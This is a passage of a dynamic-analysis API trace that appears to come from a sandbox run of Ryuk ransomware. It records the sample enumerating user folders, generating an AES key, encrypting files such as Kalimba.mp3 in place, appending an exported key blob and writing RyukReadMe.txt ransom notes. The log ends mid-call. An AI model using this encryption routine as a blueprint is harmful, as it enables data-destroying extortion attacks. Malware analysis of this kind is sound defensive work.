[0160.042] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.042] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.042] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\My Documents\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0160.042] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.045] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\NetHood\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0160.045] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.048] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.048] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT", dwFileAttributes=0x80) returned 0 [0160.048] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.048] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.048] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.049] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.049] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG", dwFileAttributes=0x80) returned 0 [0160.049] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.049] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.049] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.049] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.049] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1", dwFileAttributes=0x80) returned 0 [0160.049] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.050] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.050] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.050] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.050] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2", dwFileAttributes=0x80) returned 0 [0160.050] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.050] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.050] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.050] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.050] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", dwFileAttributes=0x80) returned 0 [0160.051] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.051] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.051] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.051] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.051] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x80) returned 0 [0160.051] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.051] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.051] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.051] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.052] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x80) returned 0 [0160.052] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.052] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.052] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.052] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Pictures\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.052] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.052] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.052] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.052] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\PrintHood\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0160.053] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.055] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Recent\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0160.055] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.059] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.059] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.059] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.059] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.059] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Searches\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.061] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.061] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.061] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.061] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms", dwFileAttributes=0x80) returned 0 [0160.061] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.062] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.062] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.062] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.065] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\SendTo\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0160.065] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.069] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Start Menu\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0160.069] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.069] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Templates\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0160.069] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.069] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Videos\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.069] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.069] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.069] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.070] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0160.070] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0xffffffffffffffff [0160.070] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.070] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d60 [0160.070] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.070] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.072] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.072] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.072] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.072] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.072] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.072] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.072] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.072] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0xffffffffffffffff [0160.073] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.074] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0xffffffffffffffff [0160.074] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.075] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0xffffffffffffffff [0160.075] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.076] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.076] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.076] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.076] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.076] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.077] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Favorites\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.077] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.077] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.077] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.077] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.078] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.078] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.078] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.078] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", dwFileAttributes=0x80) returned 1 [0160.078] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0160.079] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=876) returned 1 [0160.079] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=876) returned 1 [0160.079] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x24a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.079] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0160.080] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.080] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0160.080] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0160.080] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.080] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x36c, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x36c, lpOverlapped=0x0) returned 1 [0160.080] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0160.080] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x36c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x370) returned 1 [0160.080] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.081] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x370, lpOverlapped=0x0) returned 1 [0160.081] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0160.081] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0160.081] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0160.081] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0160.081] CloseHandle (hObject=0x188) returned 1 [0160.097] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.101] CryptDestroyKey (hKey=0x3b8690) returned 1 [0160.101] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.101] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0160.101] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.101] SetLastError (dwErrCode=0x0) [0160.101] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\RyukReadMe.txt" (normalized: "c:\\users\\public\\libraries\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0160.117] GetLastError () returned 0x0 [0160.117] WriteFile (in: hFile=0x184, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad9a0*=0x320, lpOverlapped=0x0) returned 1 [0160.118] CloseHandle (hObject=0x184) returned 1 [0160.118] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.118] SetLastError (dwErrCode=0x0) [0160.118] CreateFileW (lpFileName="C:\\Users\\Public\\RyukReadMe.txt" (normalized: "c:\\users\\public\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0160.118] GetLastError () returned 0xb7 [0160.118] CloseHandle (hObject=0x184) returned 1 [0160.119] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.119] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.119] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.119] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.119] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.119] SetLastError (dwErrCode=0x0) [0160.119] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\RyukReadMe.txt" (normalized: "c:\\users\\public\\music\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0160.119] GetLastError () returned 0xb7 [0160.119] CloseHandle (hObject=0x188) returned 1 [0160.119] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0160.120] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.120] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.120] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.120] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.120] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", dwFileAttributes=0x80) returned 1 [0160.121] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0160.121] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=8414449) returned 1 [0160.121] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=8414449) returned 1 [0160.121] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x8063cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.121] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0160.123] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.123] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0160.123] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0160.123] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac888, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac888*, lpNumberOfBytesRead=0x29ac858*=0x10, lpOverlapped=0x0) returned 1 [0160.124] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.124] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0160.124] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.124] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.141] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0160.141] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0160.146] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.146] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.149] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0160.149] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x0, lpOverlapped=0x0) returned 1 [0160.149] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0160.149] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x10) returned 1 [0160.149] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0160.149] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x10, lpOverlapped=0x0) returned 1 [0160.149] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2 | out: lpNewFilePointer=0x0) returned 1 [0160.149] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: 